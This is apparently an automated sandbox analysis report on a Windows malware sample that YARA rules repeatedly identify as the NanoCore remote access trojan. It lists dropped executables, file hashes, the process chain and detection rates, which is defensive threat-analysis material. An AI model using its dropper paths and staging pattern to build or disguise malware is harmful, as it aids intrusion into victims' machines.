        Source: Yara matchFile source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTR

        System Summary

        barindex
        Source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
        Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: xeWd55M5Lb.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6696 -s 628
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeCode function: 0_2_00406D5F0_2_00406D5F
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_004031FA1_2_004031FA
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_00409C021_2_00409C02
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_0040A1741_2_0040A174
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_004096901_2_00409690
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_0040777E1_2_0040777E
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_0040B3E11_2_0040B3E1
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_0040C3AD1_2_0040C3AD
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_009F0BE01_2_009F0BE0
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 6_2_004031FA6_2_004031FA
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 6_2_00409C026_2_00409C02
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 6_2_0040A1746_2_0040A174
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 6_2_004096906_2_00409690
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 6_2_0040777E6_2_0040777E
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 6_2_0040B3E16_2_0040B3E1
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 6_2_0040C3AD6_2_0040C3AD
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 17_2_004031FA17_2_004031FA
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 17_2_00409C0217_2_00409C02
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 17_2_0040A17417_2_0040A174
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 17_2_0040969017_2_00409690
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 17_2_0040777E17_2_0040777E
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 17_2_0040B3E117_2_0040B3E1
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 17_2_0040C3AD17_2_0040C3AD
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: String function: 00402520 appears 54 times
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: String function: 00404520 appears 38 times
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\jqenyeo.exe 525DD105980B23F780D5E9A747FF3D1BC09DD41FBFDD4266B64F1BDD6D632CFF
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe 525DD105980B23F780D5E9A747FF3D1BC09DD41FBFDD4266B64F1BDD6D632CFF
        Source: xeWd55M5Lb.exeVirustotal: Detection: 49%
        Source: xeWd55M5Lb.exeReversingLabs: Detection: 48%
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeFile read: C:\Users\user\Desktop\xeWd55M5Lb.exeJump to behavior
        Source: xeWd55M5Lb.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\xeWd55M5Lb.exe "C:\Users\user\Desktop\xeWd55M5Lb.exe"
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeProcess created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
